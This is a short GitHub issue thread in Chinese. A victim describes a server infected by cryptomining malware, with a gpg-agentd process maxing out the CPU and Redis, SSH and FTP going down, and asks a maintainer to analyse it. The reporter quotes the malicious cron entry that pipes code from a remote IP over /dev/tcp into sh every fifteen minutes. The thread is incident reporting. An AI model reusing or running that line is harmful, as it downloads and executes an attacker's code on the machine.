### ISSUE TITLE
哥，我已中招了……😭

### ISSUE THREAD

**Issue by oknixus** [BlockchainOne/crack-mining#1]
太感谢您的文章了，能帮忙分析下这个吗？
这个也是会启动gpg-agentd，然后就跑满CPU，之后网站的redis就挂掉了，同时ssh、ftp服务都挂掉了
*/15 * * * * cat</dev/tcp/159.89.190.243/44444|sh

**Comment by dbarobin** [comment]
看不到脚本，兄弟

**Comment by dbarobin** [comment]
传到附件里哈

**Comment by oknixus** [comment]
谢谢您！这个问题，之前已经处理掉了！已经是前任了，拿不到脚本了！不过要谢谢您！不然真的不知道怎么搞！
